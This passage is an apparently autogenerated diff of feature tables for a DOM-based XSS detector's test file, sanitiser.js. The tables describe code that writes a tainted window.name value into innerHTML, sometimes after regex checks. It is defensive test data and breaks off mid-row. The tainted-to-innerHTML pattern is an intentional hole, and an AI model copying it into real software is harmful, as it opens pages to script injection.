    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:21:28:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -14980,12 +108271,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:28:39:28:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:39:28:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:28:39:28:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:5:30:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:9:30:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:9:30:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:9:30:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:9:30:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:9:30:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:21:30:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15004,6 +108320,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:30:39:30:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:39:30:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:30:39:30:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:11 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:11 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:11 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:11 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:11 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:16 | regex.exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:16 | regex.exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:16 | regex.exec | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:16 | regex.exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:16 | regex.exec | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | exceptional return of regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | exceptional return of regex.exec(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | exceptional return of regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | exceptional return of regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | exceptional return of regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | regex.exec(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:7:32:25 | regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:13:32:16 | exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:13:32:16 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:13:32:16 | exec | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:13:32:16 | exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:32:13:32:16 | exec | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | CalleeFlexibleAccessPath | regex.exec | | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -15012,12 +108353,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:32:18:32:24 | tainted | receiverName | regex | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:5:33:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:9:33:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:9:33:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:9:33:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:9:33:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:9:33:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:21:33:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15036,12 +108402,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:33:39:33:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:39:33:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:33:39:33:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:5:35:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:9:35:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:9:35:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:9:35:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:9:35:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:9:35:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:21:35:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15060,6 +108451,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:35:39:35:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:39:35:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:35:39:35:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:11 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:11 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:11 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:11 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:11 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:16 | regex.exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:16 | regex.exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:16 | regex.exec | enclosingFunctionBody | tainted window name elt document createElement elt 